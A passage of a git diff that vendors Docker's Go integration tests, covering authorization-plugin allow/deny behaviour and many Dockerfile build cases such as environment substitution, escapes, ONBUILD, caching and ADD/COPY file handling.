s.ctrl.resRes.Allow = false + s.ctrl.resRes.Msg = unauthorizedMessage + + // Ensure command is blocked + res, err := s.d.Cmd("ps") + c.Assert(err, check.NotNil) + c.Assert(s.ctrl.psRequestCnt, check.Equals, 1) + c.Assert(s.ctrl.psResponseCnt, check.Equals, 1) + + // Ensure unauthorized message appears in response + c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: authorization denied by plugin %s: %s\n", testAuthZPlugin, unauthorizedMessage)) +} + +// TestAuthZPluginAllowEventStream verifies event stream propagates correctly after request pass through by the authorization plugin +func (s *DockerAuthzSuite) TestAuthZPluginAllowEventStream(c *check.C) { + testRequires(c, DaemonIsLinux) + + // start the daemon and load busybox to avoid pulling busybox from Docker Hub + c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin), check.IsNil) + s.ctrl.reqRes.Allow = true + s.ctrl.resRes.Allow = true + c.Assert(s.d.LoadBusybox(), check.IsNil) + + startTime := strconv.FormatInt(daemonTime(c).Unix(), 10) + // Add another command to to enable event pipelining + eventsCmd := exec.Command(dockerBinary, "--host", s.d.sock(), "events", "--since", startTime) + stdout, err := eventsCmd.StdoutPipe() + if err != nil { + c.Assert(err, check.IsNil) + } + + observer := eventObserver{ + buffer: new(bytes.Buffer), + command: eventsCmd, + scanner: bufio.NewScanner(stdout), + startTime: startTime, + } + + err = observer.Start() + c.Assert(err, checker.IsNil) + defer observer.Stop() + + // Create a container and wait for the creation events + out, err := s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf(out)) + containerID := strings.TrimSpace(out) + c.Assert(s.d.waitRun(containerID), checker.IsNil) + + events := map[string]chan bool{ + "create": make(chan bool, 1), + "start": make(chan bool, 1), + } + + matcher := matchEventLine(containerID, "container", events) + processor := processEventMatch(events) + go observer.Match(matcher, processor) + + // Ensure all events are received + for event, eventChannel := range events { + + select { + case <-time.After(30 * time.Second): + // Fail the test + observer.CheckEventError(c, containerID, event, matcher) + c.FailNow() + case <-eventChannel: + // Ignore, event received + } + } + + // Ensure both events and container endpoints are passed to the authorization plugin + assertURIRecorded(c, s.ctrl.requestsURIs, "/events") + assertURIRecorded(c, s.ctrl.requestsURIs, "/containers/create") + assertURIRecorded(c, s.ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", containerID)) +} + +func (s *DockerAuthzSuite) TestAuthZPluginErrorResponse(c *check.C) { + err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) + c.Assert(err, check.IsNil) + s.ctrl.reqRes.Allow = true + s.ctrl.resRes.Err = errorMessage + + // Ensure command is blocked + res, err := s.d.Cmd("ps") + c.Assert(err, check.NotNil) + + c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s\n", testAuthZPlugin, authorization.AuthZApiResponse, errorMessage)) +} + +func (s *DockerAuthzSuite) TestAuthZPluginErrorRequest(c *check.C) { + err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) + c.Assert(err, check.IsNil) + s.ctrl.reqRes.Err = errorMessage + + // Ensure command is blocked + res, err := s.d.Cmd("ps") + c.Assert(err, check.NotNil) + + c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s\n", testAuthZPlugin, authorization.AuthZApiRequest, errorMessage)) +} + +func (s *DockerAuthzSuite) TestAuthZPluginEnsureNoDuplicatePluginRegistration(c *check.C) { + c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin), check.IsNil) + + s.ctrl.reqRes.Allow = true + s.ctrl.resRes.Allow = true + + out, err := s.d.Cmd("ps") + c.Assert(err, check.IsNil, check.Commentf(out)) + + // assert plugin is only called once.. + c.Assert(s.ctrl.psRequestCnt, check.Equals, 1) + c.Assert(s.ctrl.psResponseCnt, check.Equals, 1) +} + +func (s *DockerAuthzSuite) TestAuthZPluginEnsureLoadImportWorking(c *check.C) { + c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin), check.IsNil) + s.ctrl.reqRes.Allow = true + s.ctrl.resRes.Allow = true + c.Assert(s.d.LoadBusybox(), check.IsNil) + + tmp, err := ioutil.TempDir("", "test-authz-load-import") + c.Assert(err, check.IsNil) + defer os.RemoveAll(tmp) + + savedImagePath := filepath.Join(tmp, "save.tar") + + out, err := s.d.Cmd("save", "-o", savedImagePath, "busybox") + c.Assert(err, check.IsNil, check.Commentf(out)) + out, err = s.d.Cmd("load", "--input", savedImagePath) + c.Assert(err, check.IsNil, check.Commentf(out)) + + exportedImagePath := filepath.Join(tmp, "export.tar") + + out, err = s.d.Cmd("run", "-d", "--name", "testexport", "busybox") + c.Assert(err, check.IsNil, check.Commentf(out)) + out, err = s.d.Cmd("export", "-o", exportedImagePath, "testexport") + c.Assert(err, check.IsNil, check.Commentf(out)) + out, err = s.d.Cmd("import", exportedImagePath) + c.Assert(err, check.IsNil, check.Commentf(out)) +} + +func (s *DockerAuthzSuite) TestAuthZPluginHeader(c *check.C) { + c.Assert(s.d.Start("--debug", "--authorization-plugin="+testAuthZPlugin), check.IsNil) + s.ctrl.reqRes.Allow = true + s.ctrl.resRes.Allow = true + c.Assert(s.d.LoadBusybox(), check.IsNil) + + daemonURL, err := url.Parse(s.d.sock()) + + conn, err := net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10) + c.Assert(err, check.IsNil) + client := httputil.NewClientConn(conn, nil) + req, err := http.NewRequest("GET", "/version", nil) + c.Assert(err, check.IsNil) + resp, err := client.Do(req) + + c.Assert(err, check.IsNil) + c.Assert(resp.Header["Content-Type"][0], checker.Equals, "application/json") +} + +// assertURIRecorded verifies that the given URI was sent and recorded in the authz plugin +func assertURIRecorded(c *check.C, uris []string, uri string) { + var found bool + for _, u := range uris { + if strings.Contains(u, uri) { + found = true + break + } + } + if !found { + c.Fatalf("Expected to find URI '%s', recorded uris '%s'", uri, strings.Join(uris, ",")) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go new file mode 100644 index 0000000000..49c1062c25 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go @@ -0,0 +1,7392 @@ +package main + +import ( + "archive/tar" + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "reflect" + "regexp" + "runtime" + "strconv" + "strings" + "text/template" + "time" + + "github.com/docker/docker/builder/dockerfile/command" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/pkg/stringutils" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestBuildJSONEmptyRun(c *check.C) { + name := "testbuildjsonemptyrun" + + _, err := buildImage( + name, + ` + FROM busybox + RUN [] + `, + true) + + if err != nil { + c.Fatal("error when dealing with a RUN statement with empty JSON array") + } + +} + +func (s *DockerSuite) TestBuildShCmdJSONEntrypoint(c *check.C) { + name := "testbuildshcmdjsonentrypoint" + + _, err := buildImage( + name, + ` + FROM busybox + ENTRYPOINT ["echo"] + CMD echo test + `, + true) + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "--rm", name) + + if daemonPlatform == "windows" { + if !strings.Contains(out, "cmd /S /C echo test") { + c.Fatalf("CMD did not contain cmd /S /C echo test : %q", out) + } + } else { + if strings.TrimSpace(out) != "/bin/sh -c echo test" { + c.Fatalf("CMD did not contain /bin/sh -c : %q", out) + } + } + +} + +func (s *DockerSuite) TestBuildEnvironmentReplacementUser(c *check.C) { + // Windows does not support FROM scratch or the USER command + testRequires(c, DaemonIsLinux) + name := "testbuildenvironmentreplacement" + + _, err := buildImage(name, ` + FROM scratch + ENV user foo + USER ${user} + `, true) + if err != nil { + c.Fatal(err) + } + + res := inspectFieldJSON(c, name, "Config.User") + + if res != `"foo"` { + c.Fatal("User foo from environment not in Config.User on image") + } + +} + +func (s *DockerSuite) TestBuildEnvironmentReplacementVolume(c *check.C) { + name := "testbuildenvironmentreplacement" + + var volumePath string + + if daemonPlatform == "windows" { + volumePath = "c:/quux" + } else { + volumePath = "/quux" + } + + _, err := buildImage(name, ` + FROM `+minimalBaseImage()+` + ENV volume `+volumePath+` + VOLUME ${volume} + `, true) + if err != nil { + c.Fatal(err) + } + + res := inspectFieldJSON(c, name, "Config.Volumes") + + var volumes map[string]interface{} + + if err := json.Unmarshal([]byte(res), &volumes); err != nil { + c.Fatal(err) + } + + if _, ok := volumes[volumePath]; !ok { + c.Fatal("Volume " + volumePath + " from environment not in Config.Volumes on image") + } + +} + +func (s *DockerSuite) TestBuildEnvironmentReplacementExpose(c *check.C) { + // Windows does not support FROM scratch or the EXPOSE command + testRequires(c, DaemonIsLinux) + name := "testbuildenvironmentreplacement" + + _, err := buildImage(name, ` + FROM scratch + ENV port 80 + EXPOSE ${port} + ENV ports " 99 100 " + EXPOSE ${ports} + `, true) + if err != nil { + c.Fatal(err) + } + + res := inspectFieldJSON(c, name, "Config.ExposedPorts") + + var exposedPorts map[string]interface{} + + if err := json.Unmarshal([]byte(res), &exposedPorts); err != nil { + c.Fatal(err) + } + + exp := []int{80, 99, 100} + + for _, p := range exp { + tmp := fmt.Sprintf("%d/tcp", p) + if _, ok := exposedPorts[tmp]; !ok { + c.Fatalf("Exposed port %d from environment not in Config.ExposedPorts on image", p) + } + } + +} + +func (s *DockerSuite) TestBuildEnvironmentReplacementWorkdir(c *check.C) { + name := "testbuildenvironmentreplacement" + + _, err := buildImage(name, ` + FROM busybox + ENV MYWORKDIR /work + RUN mkdir ${MYWORKDIR} + WORKDIR ${MYWORKDIR} + `, true) + + if err != nil { + c.Fatal(err) + } + +} + +func (s *DockerSuite) TestBuildEnvironmentReplacementAddCopy(c *check.C) { + name := "testbuildenvironmentreplacement" + + ctx, err := fakeContext(` + FROM `+minimalBaseImage()+` + ENV baz foo + ENV quux bar + ENV dot . + ENV fee fff + ENV gee ggg + + ADD ${baz} ${dot} + COPY ${quux} ${dot} + ADD ${zzz:-${fee}} ${dot} + COPY ${zzz:-${gee}} ${dot} + `, + map[string]string{ + "foo": "test1", + "bar": "test2", + "fff": "test3", + "ggg": "test4", + }) + + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + +} + +func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) { + // ENV expansions work differently in Windows + testRequires(c, DaemonIsLinux) + name := "testbuildenvironmentreplacement" + + _, err := buildImage(name, + ` + FROM busybox + ENV foo zzz + ENV bar ${foo} + ENV abc1='$foo' + ENV env1=$foo env2=${foo} env3="$foo" env4="${foo}" + RUN [ "$abc1" = '$foo' ] && (echo "$abc1" | grep -q foo) + ENV abc2="\$foo" + RUN [ "$abc2" = '$foo' ] && (echo "$abc2" | grep -q foo) + ENV abc3 '$foo' + RUN [ "$abc3" = '$foo' ] && (echo "$abc3" | grep -q foo) + ENV abc4 "\$foo" + RUN [ "$abc4" = '$foo' ] && (echo "$abc4" | grep -q foo) + `, true) + + if err != nil { + c.Fatal(err) + } + + res := inspectFieldJSON(c, name, "Config.Env") + + envResult := []string{} + + if err = json.Unmarshal([]byte(res), &envResult); err != nil { + c.Fatal(err) + } + + found := false + envCount := 0 + + for _, env := range envResult { + parts := strings.SplitN(env, "=", 2) + if parts[0] == "bar" { + found = true + if parts[1] != "zzz" { + c.Fatalf("Could not find replaced var for env `bar`: got %q instead of `zzz`", parts[1]) + } + } else if strings.HasPrefix(parts[0], "env") { + envCount++ + if parts[1] != "zzz" { + c.Fatalf("%s should be 'foo' but instead its %q", parts[0], parts[1]) + } + } else if strings.HasPrefix(parts[0], "env") { + envCount++ + if parts[1] != "foo" { + c.Fatalf("%s should be 'foo' but instead its %q", parts[0], parts[1]) + } + } + } + + if !found { + c.Fatal("Never found the `bar` env variable") + } + + if envCount != 4 { + c.Fatalf("Didn't find all env vars - only saw %d\n%s", envCount, envResult) + } + +} + +func (s *DockerSuite) TestBuildHandleEscapes(c *check.C) { + // The volume paths used in this test are invalid on Windows + testRequires(c, DaemonIsLinux) + name := "testbuildhandleescapes" + + _, err := buildImage(name, + ` + FROM scratch + ENV FOO bar + VOLUME ${FOO} + `, true) + + if err != nil { + c.Fatal(err) + } + + var result map[string]map[string]struct{} + + res := inspectFieldJSON(c, name, "Config.Volumes") + + if err = json.Unmarshal([]byte(res), &result); err != nil { + c.Fatal(err) + } + + if _, ok := result["bar"]; !ok { + c.Fatalf("Could not find volume bar set from env foo in volumes table, got %q", result) + } + + deleteImages(name) + + _, err = buildImage(name, + ` + FROM scratch + ENV FOO bar + VOLUME \${FOO} + `, true) + + if err != nil { + c.Fatal(err) + } + + res = inspectFieldJSON(c, name, "Config.Volumes") + + if err = json.Unmarshal([]byte(res), &result); err != nil { + c.Fatal(err) + } + + if _, ok := result["${FOO}"]; !ok { + c.Fatalf("Could not find volume ${FOO} set from env foo in volumes table, got %q", result) + } + + deleteImages(name) + + // this test in particular provides *7* backslashes and expects 6 to come back. + // Like above, the first escape is swallowed and the rest are treated as + // literals, this one is just less obvious because of all the character noise. + + _, err = buildImage(name, + ` + FROM scratch + ENV FOO bar + VOLUME \\\\\\\${FOO} + `, true) + + if err != nil { + c.Fatal(err) + } + + res = inspectFieldJSON(c, name, "Config.Volumes") + + if err = json.Unmarshal([]byte(res), &result); err != nil { + c.Fatal(err) + } + + if _, ok := result[`\\\${FOO}`]; !ok { + c.Fatalf(`Could not find volume \\\${FOO} set from env foo in volumes table, got %q`, result) + } + +} + +func (s *DockerSuite) TestBuildOnBuildLowercase(c *check.C) { + name := "testbuildonbuildlowercase" + name2 := "testbuildonbuildlowercase2" + + _, err := buildImage(name, + ` + FROM busybox + onbuild run echo quux + `, true) + + if err != nil { + c.Fatal(err) + } + + _, out, err := buildImageWithOut(name2, fmt.Sprintf(` + FROM %s + `, name), true) + + if err != nil { + c.Fatal(err) + } + + if !strings.Contains(out, "quux") { + c.Fatalf("Did not receive the expected echo text, got %s", out) + } + + if strings.Contains(out, "ONBUILD ONBUILD") { + c.Fatalf("Got an ONBUILD ONBUILD error with no error: got %s", out) + } + +} + +func (s *DockerSuite) TestBuildEnvEscapes(c *check.C) { + // ENV expansions work differently in Windows + testRequires(c, DaemonIsLinux) + name := "testbuildenvescapes" + _, err := buildImage(name, + ` + FROM busybox + ENV TEST foo + CMD echo \$ + `, + true) + + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "-t", name) + + if strings.TrimSpace(out) != "$" { + c.Fatalf("Env TEST was not overwritten with bar when foo was supplied to dockerfile: was %q", strings.TrimSpace(out)) + } + +} + +func (s *DockerSuite) TestBuildEnvOverwrite(c *check.C) { + // ENV expansions work differently in Windows + testRequires(c, DaemonIsLinux) + name := "testbuildenvoverwrite" + + _, err := buildImage(name, + ` + FROM busybox + ENV TEST foo + CMD echo ${TEST} + `, + true) + + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "-e", "TEST=bar", "-t", name) + + if strings.TrimSpace(out) != "bar" { + c.Fatalf("Env TEST was not overwritten with bar when foo was supplied to dockerfile: was %q", strings.TrimSpace(out)) + } + +} + +func (s *DockerSuite) TestBuildOnBuildCmdEntrypointJSON(c *check.C) { + name1 := "onbuildcmd" + name2 := "onbuildgenerated" + + _, err := buildImage(name1, ` +FROM busybox +ONBUILD CMD ["hello world"] +ONBUILD ENTRYPOINT ["echo"] +ONBUILD RUN ["true"]`, + false) + + if err != nil { + c.Fatal(err) + } + + _, err = buildImage(name2, fmt.Sprintf(`FROM %s`, name1), false) + + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", name2) + + if !regexp.MustCompile(`(?m)^hello world`).MatchString(out) { + c.Fatalf("did not get echo output from onbuild. Got: %q", out) + } + +} + +func (s *DockerSuite) TestBuildOnBuildEntrypointJSON(c *check.C) { + name1 := "onbuildcmd" + name2 := "onbuildgenerated" + + _, err := buildImage(name1, ` +FROM busybox +ONBUILD ENTRYPOINT ["echo"]`, + false) + + if err != nil { + c.Fatal(err) + } + + _, err = buildImage(name2, fmt.Sprintf("FROM %s\nCMD [\"hello world\"]\n", name1), false) + + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", name2) + + if !regexp.MustCompile(`(?m)^hello world`).MatchString(out) { + c.Fatal("got malformed output from onbuild", out) + } + +} + +func (s *DockerSuite) TestBuildCacheAdd(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows doesn't have httpserver image yet + name := "testbuildtwoimageswithadd" + server, err := fakeStorage(map[string]string{ + "robots.txt": "hello", + "index.html": "world", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + if _, err := buildImage(name, + fmt.Sprintf(`FROM scratch + ADD %s/robots.txt /`, server.URL()), + true); err != nil { + c.Fatal(err) + } + if err != nil { + c.Fatal(err) + } + deleteImages(name) + _, out, err := buildImageWithOut(name, + fmt.Sprintf(`FROM scratch + ADD %s/index.html /`, server.URL()), + true) + if err != nil { + c.Fatal(err) + } + if strings.Contains(out, "Using cache") { + c.Fatal("2nd build used cache on ADD, it shouldn't") + } + +} + +func (s *DockerSuite) TestBuildLastModified(c *check.C) { + name := "testbuildlastmodified" + + server, err := fakeStorage(map[string]string{ + "file": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + var out, out2 string + + dFmt := `FROM busybox +ADD %s/file /` + + dockerfile := fmt.Sprintf(dFmt, server.URL()) + + if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil { + c.Fatal(err) + } + + out, _ = dockerCmd(c, "run", name, "ls", "-le", "/file") + + // Build it again and make sure the mtime of the file didn't change. + // Wait a few seconds to make sure the time changed enough to notice + time.Sleep(2 * time.Second) + + if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil { + c.Fatal(err) + } + out2, _ = dockerCmd(c, "run", name, "ls", "-le", "/file") + + if out != out2 { + c.Fatalf("MTime changed:\nOrigin:%s\nNew:%s", out, out2) + } + + // Now 'touch' the file and make sure the timestamp DID change this time + // Create a new fakeStorage instead of just using Add() to help windows + server, err = fakeStorage(map[string]string{ + "file": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + dockerfile = fmt.Sprintf(dFmt, server.URL()) + + if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil { + c.Fatal(err) + } + out2, _ = dockerCmd(c, "run", name, "ls", "-le", "/file") + + if out == out2 { + c.Fatalf("MTime didn't change:\nOrigin:%s\nNew:%s", out, out2) + } + +} + +// Regression for https://github.com/docker/docker/pull/27805 +// Makes sure that we don't use the cache if the contents of +// a file in a subfolder of the context is modified and we re-build. +func (s *DockerSuite) TestBuildModifyFileInFolder(c *check.C) { + name := "testbuildmodifyfileinfolder" + + ctx, err := fakeContext(`FROM busybox +RUN ["mkdir", "/test"] +ADD folder/file /test/changetarget`, + map[string]string{}) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if err := ctx.Add("folder/file", "first"); err != nil { + c.Fatal(err) + } + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + if err := ctx.Add("folder/file", "second"); err != nil { + c.Fatal(err) + } + id2, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + if id1 == id2 { + c.Fatal("cache was used even though file contents in folder was changed") + } +} + +func (s *DockerSuite) TestBuildAddSingleFileToRoot(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testaddimg" + ctx, err := fakeContext(fmt.Sprintf(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN touch /exists +RUN chown dockerio.dockerio /exists +ADD test_file / +RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /test_file | awk '{print $1}') = '%s' ] +RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod), + map[string]string{ + "test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// Issue #3960: "ADD src ." hangs +func (s *DockerSuite) TestBuildAddSingleFileToWorkdir(c *check.C) { + name := "testaddsinglefiletoworkdir" + ctx, err := fakeContext(`FROM busybox +ADD test_file .`, + map[string]string{ + "test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + errChan := make(chan error) + go func() { + _, err := buildImageFromContext(name, ctx, true) + errChan <- err + close(errChan) + }() + select { + case <-time.After(15 * time.Second): + c.Fatal("Build with adding to workdir timed out") + case err := <-errChan: + c.Assert(err, check.IsNil) + } +} + +func (s *DockerSuite) TestBuildAddSingleFileToExistDir(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testaddsinglefiletoexistdir" + ctx, err := fakeContext(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN mkdir /exists +RUN touch /exists/exists_file +RUN chown -R dockerio.dockerio /exists +ADD test_file /exists/ +RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] +RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, + map[string]string{ + "test_file": "test1", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopyAddMultipleFiles(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + server, err := fakeStorage(map[string]string{ + "robots.txt": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + name := "testcopymultiplefilestofile" + ctx, err := fakeContext(fmt.Sprintf(`FROM busybox +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd +RUN echo 'dockerio:x:1001:' >> /etc/group +RUN mkdir /exists +RUN touch /exists/exists_file +RUN chown -R dockerio.dockerio /exists +COPY test_file1 test_file2 /exists/ +ADD test_file3 test_file4 %s/robots.txt /exists/ +RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ] +RUN [ $(ls -l /exists/test_file1 | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists/test_file2 | awk '{print $3":"$4}') = 'root:root' ] + +RUN [ $(ls -l /exists/test_file3 | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists/test_file4 | awk '{print $3":"$4}') = 'root:root' ] +RUN [ $(ls -l /exists/robots.txt | awk '{print $3":"$4}') = 'root:root' ] + +RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ] +`, server.URL()), + map[string]string{ + "test_file1": "test1", + "test_file2": "test2", + "test_file3": "test3", + "test_file4": "test4", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// This test is mainly for user namespaces to verify that new directories +// are created as the remapped root uid/gid pair +func (s *DockerSuite) TestBuildAddToNewDestination(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testaddtonewdest" + ctx, err := fakeContext(`FROM busybox +ADD . /new_dir +RUN ls -l / +RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`, + map[string]string{ + "test_dir/test_file": "test file", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// This test is mainly for user namespaces to verify that new directories +// are created as the remapped root uid/gid pair +func (s *DockerSuite) TestBuildCopyToNewParentDirectory(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testcopytonewdir" + ctx, err := fakeContext(`FROM busybox +COPY test_dir /new_dir +RUN ls -l /new_dir +RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`, + map[string]string{ + "test_dir/test_file": "test file", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// This test is mainly for user namespaces to verify that new directories +// are created as the remapped root uid/gid pair +func (s *DockerSuite) TestBuildWorkdirIsContainerRoot(c *check.C) { + testRequires(c, DaemonIsLinux) // Linux specific test + name := "testworkdirownership" + if _, err := buildImage(name, `FROM busybox +WORKDIR /new_dir +RUN ls -l / +RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildAddFileWithWhitespace(c *check.C) { + testRequires(c, DaemonIsLinux) // Not currently passing on Windows + name := "testaddfilewithwhitespace" + ctx, err := fakeContext(`FROM busybox +RUN mkdir "/test dir" +RUN mkdir "/test_dir" +ADD [ "test file1", "/test_file1" ] +ADD [ "test_file2", "/test file2" ] +ADD [ "test file3", "/test file3" ] +ADD [ "test dir/test_file4", "/test_dir/test_file4" ] +ADD [ "test_dir/test_file5", "/test dir/test_file5" ] +ADD [ "test dir/test_file6", "/test dir/test_file6" ] +RUN [ $(cat "/test_file1") = 'test1' ] +RUN [ $(cat "/test file2") = 'test2' ] +RUN [ $(cat "/test file3") = 'test3' ] +RUN [ $(cat "/test_dir/test_file4") = 'test4' ] +RUN [ $(cat "/test dir/test_file5") = 'test5' ] +RUN [ $(cat "/test dir/test_file6") = 'test6' ]`, + map[string]string{ + "test file1": "test1", + "test_file2": "test2", + "test file3": "test3", + "test dir/test_file4": "test4", + "test_dir/test_file5": "test5", + "test dir/test_file6": "test6", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopyFileWithWhitespace(c *check.C) { + dockerfile := `FROM busybox +RUN mkdir "/test dir" +RUN mkdir "/test_dir" +COPY [ "test file1", "/test_file1" ] +COPY [ "test_file2", "/test file2" ] +COPY [ "test file3", "/test file3" ] +COPY [ "test dir/test_file4", "/test_dir/test_file4" ] +COPY [ "test_dir/test_file5", "/test dir/test_file5" ] +COPY [ "test dir/test_file6", "/test dir/test_file6" ] +RUN [ $(cat "/test_file1") = 'test1' ] +RUN [ $(cat "/test file2") = 'test2' ] +RUN [ $(cat "/test file3") = 'test3' ] +RUN [ $(cat "/test_dir/test_file4") = 'test4' ] +RUN [ $(cat "/test dir/test_file5") = 'test5' ] +RUN [ $(cat "/test dir/test_file6") = 'test6' ]` + + if daemonPlatform == "windows" { + dockerfile = `FROM ` + WindowsBaseImage + ` +RUN mkdir "C:/test dir" +RUN mkdir "C:/test_dir" +COPY [ "test file1", "/test_file1" ] +COPY [ "test_file2", "/test file2" ] +COPY [ "test file3", "/test file3" ] +COPY [ "test dir/test_file4", "/test_dir/test_file4" ] +COPY [ "test_dir/test_file5", "/test dir/test_file5" ] +COPY [ "test dir/test_file6", "/test dir/test_file6" ] +RUN find "test1" "C:/test_file1" +RUN find "test2" "C:/test file2" +RUN find "test3" "C:/test file3" +RUN find "test4" "C:/test_dir/test_file4" +RUN find "test5" "C:/test dir/test_file5" +RUN find "test6" "C:/test dir/test_file6"` + } + + name := "testcopyfilewithwhitespace" + ctx, err := fakeContext(dockerfile, + map[string]string{ + "test file1": "test1", + "test_file2": "test2", + "test file3": "test3", + "test dir/test_file4": "test4", + "test_dir/test_file5": "test5", + "test dir/test_file6": "test6", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCopyWildcard(c *check.C) { + name := "testcopywildcard" + server, err := fakeStorage(map[string]string{ + "robots.txt": "hello", + "index.html": "world", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + COPY file*.txt /tmp/ + RUN ls /tmp/file1.txt /tmp/file2.txt + RUN [ "mkdir", "/tmp1" ] + COPY dir* /tmp1/ + RUN ls /tmp1/dirt /tmp1/nested_file /tmp1/nested_dir/nest_nest_file + RUN [ "mkdir", "/tmp2" ] + ADD dir/*dir %s/robots.txt /tmp2/ + RUN ls /tmp2/nest_nest_file /tmp2/robots.txt + `, server.URL()), + map[string]string{ + "file1.txt": "test1", + "file2.txt": "test2", + "dir/nested_file": "nested file", + "dir/nested_dir/nest_nest_file": "2 times nested", + "dirt": "dirty", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + + // Now make sure we use a cache the 2nd time + id2, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + + if id1 != id2 { + c.Fatal("didn't use the cache") + } + +} + +func (s *DockerSuite) TestBuildCopyWildcardInName(c *check.C) { + name := "testcopywildcardinname" + ctx, err := fakeContext(`FROM busybox + COPY *.txt /tmp/ + RUN [ "$(cat /tmp/\*.txt)" = 'hi there' ] + `, map[string]string{"*.txt": "hi there"}) + + if err != nil { + // Normally we would do c.Fatal(err) here but given that + // the odds of this failing are so rare, it must be because + // the OS we're running the client on doesn't support * in + // filenames (like windows). So, instead of failing the test + // just let it pass. Then we don't need to explicitly + // say which OSs this works on or not. + return + } + defer ctx.Close() + + _, err = 